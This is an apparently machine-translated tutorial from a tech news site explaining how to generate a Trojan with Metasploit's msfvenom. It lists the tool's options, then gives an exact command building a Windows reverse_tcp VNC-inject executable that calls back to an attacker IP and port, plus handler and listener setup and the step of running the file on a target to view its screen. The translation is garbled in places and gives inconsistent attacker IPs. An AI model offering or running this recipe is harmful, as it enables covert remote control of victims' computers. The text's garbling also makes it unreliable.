Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

What is the principle of Trojan horse generation in Metasploit?

2025-02-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Share

Shulou(Shulou.com)06/02 Report--

Metasploit Trojan horse generation principle is what, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

First, the generation method: using the msfvenom module in the msf module

Principle: msfvenom is a combination of msfpayload and msfencode. Trojan programs are generated by msfvenom, executed on the target machine, and monitored online locally.

3. The msfvenom command line options are as follows

-p,-- payload specifies the payload (attack load) to be used. If you need to use a custom payload, use & # 039; or stdin to specify

-l,-- list [module_type] lists all available resources for the specified module. Module types include: payloads, encoders, nops, all

-n,-- nopsled specifies a NOP sliding length for payload in advance

-f,-- format specify the output format (use-- help-formats to get a list of output formats supported by msf)

-e,-- encoder [encoder] specifies the encoder (encoder) to be used

-a,-- arch specifies the target schema of the payload

-- platform specifies the target platform for payload

-s,-- space sets the maximum length of the effective attack load

-b,-- bad-chars sets the circumvention character set, for example: & # 039;\ x00\ xff'

-I,-- iterations specifies the number of payload encodings

-c,-- add-code specifies an additional win32 shellcode file

-x,-- template specifies a custom executable file as the template

-k,-- keep protects the action of the template program, and the injected payload runs as a new process

-- payload-options lists the standard options for payload

-o,-- out saves payload

-v,-- var-name specifies a custom variable to determine the output format

-- shellest minimizes generation of payload

-h,-- help view help options

-- help-formats views the list of output formats supported by msf

IV. Method of use

1. Msfvenom-- the platform supported by list platforms display

2. Msfvenom-- the format supported by list formats display

3. Msfvenom-- the architecture supported by list archs display

4. Msfvenom-Encoder supported by list encoders display

5. Generate Trojan horse

Target host: 192.168.1.129 (win7 x64)

Attack aircraft: 192.168.1.33

Attack port: 12121

Generate Trojan horse: msfvenom-- arch x64-- platform windows-p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121-f exe-o / root/win64.exe

6. Enter the listening module use exploit/multi/handler

7. Set payload bounce set payload windows/x64/vncinject/reverse_tcp

8. Check the parameters to be set: show options

9. Set up the attack plane ip:set lhost 192.168.1.133

10. Set attack port: set lport 12121

11. Upload the generated exe file to the target host and run it

12. Run attack

13. The monitoring screen of the attack plane

14. Target host screen

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Internet Technology

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report